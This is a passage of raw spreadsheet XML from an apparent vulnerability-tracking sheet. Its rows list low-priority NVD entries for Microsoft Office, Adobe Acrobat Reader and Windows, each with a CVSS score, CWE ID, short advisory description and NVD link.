t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80162</t></is></c></row><row r="1308"><c r="A1308" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1308" s="5" t="inlineStr"><is><t>CVE-2026-81387</t></is></c><c r="D1308" s="5" t="n"><v>5.5</v></c><c r="E1308" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1308" s="5" t="inlineStr" /><c r="H1308" s="5" t="n"><v>0.004</v></c><c r="I1308" s="5" t="inlineStr" /><c r="J1308" s="5" t="inlineStr" /><c r="K1308" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1308" s="5" t="inlineStr" /><c r="M1308" s="5" t="inlineStr" /><c r="N1308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1308" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1308" s="5" t="inlineStr" /><c r="R1308" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1308" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81387</t></is></c></row><row r="1309"><c r="A1309" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1309" s="5" t="inlineStr"><is><t>CVE-2026-81390</t></is></c><c r="D1309" s="5" t="n"><v>5.5</v></c><c r="E1309" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1309" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1309" s="5" t="inlineStr" /><c r="H1309" s="5" t="n"><v>0.004</v></c><c r="I1309" s="5" t="inlineStr" /><c r="J1309" s="5" t="inlineStr" /><c r="K1309" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1309" s="5" t="inlineStr" /><c r="M1309" s="5" t="inlineStr" /><c r="N1309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1309" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1309" s="5" t="inlineStr" /><c r="R1309" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1309" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81390</t></is></c></row><row r="1310"><c r="A1310" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1310" s="5" t="inlineStr"><is><t>CVE-2026-81391</t></is></c><c r="D1310" s="5" t="n"><v>5.5</v></c><c r="E1310" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1310" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1310" s="5" t="inlineStr" /><c r="H1310" s="5" t="n"><v>0.004</v></c><c r="I1310" s="5" t="inlineStr" /><c r="J1310" s="5" t="inlineStr" /><c r="K1310" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1310" s="5" t="inlineStr" /><c r="M1310" s="5" t="inlineStr" /><c r="N1310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1310" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1310" s="5" t="inlineStr" /><c r="R1310" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1310" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81391</t></is></c></row><row r="1311"><c r="A1311" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1311" s="5" t="inlineStr"><is><t>CVE-2026-81392</t></is></c><c r="D1311" s="5" t="n"><v>5.5</v></c><c r="E1311" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1311" s="5" t="inlineStr" /><c r="H1311" s="5" t="n"><v>0.005</v></c><c r="I1311" s="5" t="inlineStr" /><c r="J1311" s="5" t="inlineStr" /><c r="K1311" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1311" s="5" t="inlineStr" /><c r="M1311" s="5" t="inlineStr" /><c r="N1311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1311" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1311" s="5" t="inlineStr" /><c r="R1311" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1311" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81392</t></is></c></row><row r="1312"><c r="A1312" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1312" s="5" t="inlineStr"><is><t>CVE-2026-81393</t></is></c><c r="D1312" s="5" t="n"><v>5.5</v></c><c r="E1312" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1312" s="5" t="inlineStr" /><c r="H1312" s="5" t="n"><v>0.004</v></c><c r="I1312" s="5" t="inlineStr" /><c r="J1312" s="5" t="inlineStr" /><c r="K1312" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1312" s="5" t="inlineStr" /><c r="M1312" s="5" t="inlineStr" /><c r="N1312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1312" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1312" s="5" t="inlineStr" /><c r="R1312" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1312" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81393</t></is></c></row><row r="1313"><c r="A1313" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1313" s="5" t="inlineStr"><is><t>CVE-2026-81394</t></is></c><c r="D1313" s="5" t="n"><v>5.5</v></c><c r="E1313" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1313" s="5" t="inlineStr" /><c r="H1313" s="5" t="n"><v>0.004</v></c><c r="I1313" s="5" t="inlineStr" /><c r="J1313" s="5" t="inlineStr" /><c r="K1313" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1313" s="5" t="inlineStr" /><c r="M1313" s="5" t="inlineStr" /><c r="N1313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1313" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1313" s="5" t="inlineStr" /><c r="R1313" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1313" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81394</t></is></c></row><row r="1314"><c r="A1314" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1314" s="5" t="inlineStr"><is><t>CVE-2026-81395</t></is></c><c r="D1314" s="5" t="n"><v>5.5</v></c><c r="E1314" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1314" s="5" t="inlineStr" /><c r="H1314" s="5" t="n"><v>0.005</v></c><c r="I1314" s="5" t="inlineStr" /><c r="J1314" s="5" t="inlineStr" /><c r="K1314" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1314" s="5" t="inlineStr" /><c r="M1314" s="5" t="inlineStr" /><c r="N1314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1314" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1314" s="5" t="inlineStr" /><c r="R1314" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1314" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81395</t></is></c></row><row r="1315"><c r="A1315" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1315" s="5" t="inlineStr"><is><t>CVE-2026-81399</t></is></c><c r="D1315" s="5" t="n"><v>5.5</v></c><c r="E1315" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1315" s="5" t="inlineStr" /><c r="H1315" s="5" t="n"><v>0.004</v></c><c r="I1315" s="5" t="inlineStr" /><c r="J1315" s="5" t="inlineStr" /><c r="K1315" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1315" s="5" t="inlineStr" /><c r="M1315" s="5" t="inlineStr" /><c r="N1315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1315" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1315" s="5" t="inlineStr" /><c r="R1315" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1315" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81399</t></is></c></row><row r="1316"><c r="A1316" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1316" s="5" t="inlineStr"><is><t>CVE-2026-81400</t></is></c><c r="D1316" s="5" t="n"><v>5.5</v></c><c r="E1316" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1316" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1316" s="5" t="inlineStr" /><c r="H1316" s="5" t="n"><v>0.004</v></c><c r="I1316" s="5" t="inlineStr" /><c r="J1316" s="5" t="inlineStr" /><c r="K1316" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1316" s="5" t="inlineStr" /><c r="M1316" s="5" t="inlineStr" /><c r="N1316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1316" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1316" s="5" t="inlineStr" /><c r="R1316" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1316" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81400</t></is></c></row><row r="1317"><c r="A1317" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1317" s="5" t="inlineStr"><is><t>CVE-2026-81401</t></is></c><c r="D1317" s="5" t="n"><v>5.5</v></c><c r="E1317" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1317" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1317" s="5" t="inlineStr" /><c r="H1317" s="5" t="n"><v>0.005</v></c><c r="I1317" s="5" t="inlineStr" /><c r="J1317" s="5" t="inlineStr" /><c r="K1317" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1317" s="5" t="inlineStr" /><c r="M1317" s="5" t="inlineStr" /><c r="N1317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1317" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1317" s="5" t="inlineStr" /><c r="R1317" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S1317" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81401</t></is></c></row><row r="1318"><c r="A1318" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1318" s="5" t="inlineStr"><is><t>CVE-2026-81958</t></is></c><c r="D1318" s="5" t="n"><v>5.5</v></c><c r="E1318" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1318" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1318" s="5" t="inlineStr" /><c r="H1318" s="5" t="n"><v>0.004</v></c><c r="I1318" s="5" t="inlineStr" /><c r="J1318" s="5" t="inlineStr" /><c r="K1318" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1318" s="5" t="inlineStr" /><c r="M1318" s="5" t="inlineStr" /><c r="N1318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1318" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1318" s="5" t="inlineStr" /><c r="R1318" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1318" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81958</t></is></c></row><row r="1319"><c r="A1319" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1319" s="5" t="inlineStr"><is><t>CVE-2026-81977</t></is></c><c r="D1319" s="5" t="n"><v>5.5</v></c><c r="E1319" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1319" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1319" s="5" t="inlineStr" /><c r="H1319" s="5" t="n"><v>0.002</v></c><c r="I1319" s="5" t="inlineStr" /><c r="J1319" s="5" t="inlineStr" /><c r="K1319" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1319" s="5" t="inlineStr" /><c r="M1319" s="5" t="inlineStr" /><c r="N1319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1319" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1319" s="5" t="inlineStr" /><c r="R1319" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1319" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81977</t></is></c></row><row r="1320"><c r="A1320" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1320" s="5" t="inlineStr"><is><t>CVE-2026-81978</t></is></c><c r="D1320" s="5" t="n"><v>5.5</v></c><c r="E1320" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1320" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1320" s="5" t="inlineStr" /><c r="H1320" s="5" t="n"><v>0.002</v></c><c r="I1320" s="5" t="inlineStr" /><c r="J1320" s="5" t="inlineStr" /><c r="K1320" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1320" s="5" t="inlineStr" /><c r="M1320" s="5" t="inlineStr" /><c r="N1320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1320" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1320" s="5" t="inlineStr" /><c r="R1320" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1320"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20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81978</t></is></c></row><row r="1321"><c r="A1321" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1321" s="5" t="inlineStr"><is><t>CVE-2026-81982</t></is></c><c r="D1321" s="5" t="n"><v>5.5</v></c><c r="E1321" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1321" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1321" s="5" t="inlineStr" /><c r="H1321" s="5" t="n"><v>0.002</v></c><c r="I1321" s="5" t="inlineStr" /><c r="J1321" s="5" t="inlineStr" /><c r="K1321" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1321" s="5" t="inlineStr" /><c r="M1321" s="5" t="inlineStr" /><c r="N1321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1321" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1321" s="5" t="inlineStr" /><c r="R1321" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1321"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21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81982</t></is></c></row><row r="1322"><c r="A1322" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1322" s="5" t="inlineStr"><is><t>CVE-2026-81984</t></is></c><c r="D1322" s="5" t="n"><v>5.5</v></c><c r="E1322" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1322" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1322" s="5" t="inlineStr" /><c r="H1322" s="5" t="n"><v>0.002</v></c><c r="I1322" s="5" t="inlineStr" /><c r="J1322" s="5" t="inlineStr" /><c r="K1322" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1322" s="5" t="inlineStr" /><c r="M1322" s="5" t="inlineStr" /><c r="N1322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1322" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1322" s="5" t="inlineStr" /><c r="R1322" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1322" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81984</t></is></c></row><row r="1323"><c r="A1323" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1323" s="5" t="inlineStr"><is><t>CVE-2026-81991</t></is></c><c r="D1323" s="5" t="n"><v>5.5</v></c><c r="E1323" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1323" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1323" s="5" t="inlineStr" /><c r="H1323" s="5" t="n"><v>0.002</v></c><c r="I1323" s="5" t="inlineStr" /><c r="J1323" s="5" t="inlineStr" /><c r="K1323" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1323" s="5" t="inlineStr" /><c r="M1323" s="5" t="inlineStr" /><c r="N1323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1323" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1323" s="5" t="inlineStr" /><c r="R1323" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1323"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23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81991</t></is></c></row><row r="1324"><c r="A1324" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1324" s="5" t="inlineStr"><is><t>CVE-2026-81993</t></is></c><c r="D1324" s="5" t="n"><v>5.5</v></c><c r="E1324" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1324" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1324" s="5" t="inlineStr" /><c r="H1324" s="5" t="n"><v>0.002</v></c><c r="I1324" s="5" t="inlineStr" /><c r="J1324" s="5" t="inlineStr" /><c r="K1324" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1324" s="5" t="inlineStr" /><c r="M1324" s="5" t="inlineStr" /><c r="N1324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1324" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1324" s="5" t="inlineStr" /><c r="R1324" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1324" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81993</t></is></c></row><row r="1325"><c r="A1325" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1325" s="5" t="inlineStr"><is><t>CVE-2026-82001</t></is></c><c r="D1325" s="5" t="n"><v>5.5</v></c><c r="E1325" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1325" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1325" s="5" t="inlineStr" /><c r="H1325" s="5" t="n"><v>0.002</v></c><c r="I1325" s="5" t="inlineStr" /><c r="J1325" s="5" t="inlineStr" /><c r="K1325" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1325" s="5" t="inlineStr" /><c r="M1325" s="5" t="inlineStr" /><c r="N1325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1325" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1325" s="5" t="inlineStr" /><c r="R1325" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1325" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82001</t></is></c></row><row r="1326"><c r="A1326" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1326" s="5" t="inlineStr"><is><t>CVE-2026-83501</t></is></c><c r="D1326" s="5" t="n"><v>5.5</v></c><c r="E1326" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1326" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1326" s="5" t="inlineStr" /><c r="H1326" s="5" t="n"><v>0.003</v></c><c r="I1326" s="5" t="inlineStr" /><c r="J1326" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1326" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1326" s="5" t="inlineStr" /><c r="M1326" s="5" t="inlineStr" /><c r="N1326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1326" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1326" s="5" t="inlineStr" /><c r="R1326" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1326" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t></is></c><c r="T1326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t></is></c></row><row r="1327"><c r="A1327" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1327" s="5" t="inlineStr"><is><t>CVE-2026-83949</t></is></c><c r="D1327" s="5" t="n"><v>5.5</v></c><c r="E1327" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1327" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1327" s="5" t="inlineStr" /><c r="H1327" s="5" t="n"><v>0.004</v></c><c r="I1327" s="5" t="inlineStr" /><c r="J1327" s="5" t="inlineStr" /><c r="K1327" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1327" s="5" t="inlineStr" /><c r="M1327" s="5" t="inlineStr" /><c r="N1327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1327" s="5" t="inlineStr" /><c r="R1327" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1327" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information 